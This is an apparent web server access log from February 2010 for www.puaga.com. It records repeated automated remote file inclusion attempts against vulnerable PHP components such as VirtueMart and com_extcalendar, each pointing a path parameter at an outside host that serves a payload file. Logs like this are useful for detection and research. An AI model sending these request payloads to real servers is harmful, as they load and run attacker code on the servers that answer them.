66.103.128.44 - - [07/Feb/2010:08:28:55 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:08:28:55 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:08:28:56 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:08:30:09 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:08:30:09 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:08:30:09 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [07/Feb/2010:08:32:38 -0800] "GET /logs//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [07/Feb/2010:08:32:38 -0800] "GET /logs/access_100118.log//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [07/Feb/2010:08:32:38 -0800] "GET /www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [07/Feb/2010:08:32:40 -0800] "GET /logs//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [07/Feb/2010:08:32:40 -0800] "GET /www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [07/Feb/2010:08:32:40 -0800] "GET /logs/access_100118.log//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [07/Feb/2010:08:32:42 -0800] "GET /www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [07/Feb/2010:08:32:42 -0800] "GET /logs/access_100118.log//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [07/Feb/2010:08:32:42 -0800] "GET /logs//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [07/Feb/2010:08:32:55 -0800] "GET /logs/access_100118.log//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [07/Feb/2010:08:32:55 -0800] "GET /logs//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [07/Feb/2010:08:32:55 -0800] "GET /www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [07/Feb/2010:08:33:38 -0800] "GET /logs/access_100201.log//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [07/Feb/2010:08:33:38 -0800] "GET /logs/access_100201.log//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [07/Feb/2010:08:33:41 -0800] "GET /logs/access_100201.log//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [07/Feb/2010:08:33:47 -0800] "GET /logs/access_100109.log///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.108.61.176 - - [07/Feb/2010:08:33:48 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.108.61.176 - - [07/Feb/2010:08:33:49 -0800] "GET /logs///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
213.251.189.203 - - [07/Feb/2010:08:33:53 -0800] "GET /logs/access_100201.log//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:34:22 -0800] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:34:22 -0800] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:34:25 -0800] "GET /logs/access_100113.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:34:43 -0800] "GET /logs/access_100119.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:34:58 -0800] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:34:58 -0800] "GET /logs/access_100113.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:35:01 -0800] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:35:16 -0800] "GET /logs/access_100119.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:35:27 -0800] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:35:27 -0800] "GET /logs/access_100113.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:35:30 -0800] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:35:41 -0800] "GET /logs/access_100113.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:35:44 -0800] "GET /logs/access_100119.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:35:49 -0800] "GET /logs/access_100119.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [07/Feb/2010:08:35:50 -0800] "GET /logs/access_100129.log///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:36:33 -0800] "GET /logs/access_100113.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [07/Feb/2010:08:36:37 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [07/Feb/2010:08:36:40 -0800] "GET /logs/access_100108.log/akocomments.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [07/Feb/2010:08:36:40 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:36:42 -0800] "GET /logs/access_100119.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:37:08 -0800] "GET /logs/access_100113.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [07/Feb/2010:08:37:16 -0800] "GET /logs/access_100119.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.38.54.250 - - [07/Feb/2010:08:37:54 -0800] "GET /logs/access_100123.log//citywriter/head.php?path=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
70.38.54.250 - - [07/Feb/2010:08:38:29 -0800] "GET /logs/access_100115.log//citywriter/head.php?path=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:08:38:55 -0800] "GET /logs/access_100121.log//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:08:38:55 -0800] "GET /errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:08:38:55 -0800] "GET /logs//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:08:38:59 -0800] "GET /logs/access_100113.log//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
213.171.37.206 - - [07/Feb/2010:08:39:14 -0800] "GET /logs/access_100121.log%20//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [07/Feb/2010:08:39:14 -0800] "GET /logs//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [07/Feb/2010:08:39:14 -0800] "GET /errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
216.17.109.216 - - [07/Feb/2010:08:39:43 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [07/Feb/2010:08:39:43 -0800] "GET /logs/access_100123.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [07/Feb/2010:08:39:44 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:40:05 -0800] "GET /logs/access_100103.log%20%20/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.37.206 - - [07/Feb/2010:08:40:27 -0800] "GET /logs/access_100121.log//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [07/Feb/2010:08:40:47 -0800] "GET /logs/access_100113.log//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:41:05 -0800] "GET /logs/access_100123.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:41:05 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:41:05 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:41:08 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:41:08 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:41:08 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [07/Feb/2010:08:41:26 -0800] "GET /logs/access_100119.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:42:37 -0800] "GET /logs/access_100119.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:43:00 -0800] "GET /logs/access_100103.log%20%20/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.38.54.250 - - [07/Feb/2010:08:43:09 -0800] "GET /logs/access_100122.log//citywriter/head.php?path=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:43:10 -0800] "GET /logs/access_100115.log%20%20/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.38.54.250 - - [07/Feb/2010:08:43:10 -0800] "GET /logs/access_100114.log//citywriter/head.php?path=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
70.38.54.250 - - [07/Feb/2010:08:43:34 -0800] "GET /Neos_Chronos/header.php?base_folder=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
70.38.54.250 - - [07/Feb/2010:08:43:35 -0800] "GET /logs/access_100108.log//Neos_Chronos/header.php?base_folder=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
70.38.54.250 - - [07/Feb/2010:08:43:51 -0800] "GET /logs/access_100114.log//Neos_Chronos/header.php?base_folder=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
211.95.78.56 - - [07/Feb/2010:08:44:01 -0800] "GET /logs/access_100107.log%20%20///vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [07/Feb/2010:08:44:01 -0800] "GET /logs///vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [07/Feb/2010:08:44:01 -0800] "GET //vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:44:35 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:44:35 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:44:36 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:45:33 -0800] "GET /logs//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:45:33 -0800] "GET /logs/access_100111.log//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:45:33 -0800] "GET /bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:46:11 -0800] "GET /bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:46:11 -0800] "GET /logs/access_100111.log//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:46:11 -0800] "GET /logs//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:08:47:04 -0800] "GET /logs/access_100121.log%20//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:47:09 -0800] "GET /logs/access_100111.log//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:47:09 -0800] "GET /bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:47:09 -0800] "GET /logs//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:47:31 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:47:31 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:47:31 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [07/Feb/2010:08:48:39 -0800] "GET //admin.php?include_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [07/Feb/2010:08:48:39 -0800] "GET /logs/access_100117.log%20%20///admin.php?include_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [07/Feb/2010:08:48:39 -0800] "GET /logs///admin.php?include_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [07/Feb/2010:08:48:54 -0800] "GET //admin.php?include_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [07/Feb/2010:08:48:54 -0800] "GET /logs/access_100117.log%20%20///admin.php?include_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [07/Feb/2010:08:48:54 -0800] "GET /logs///admin.php?include_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
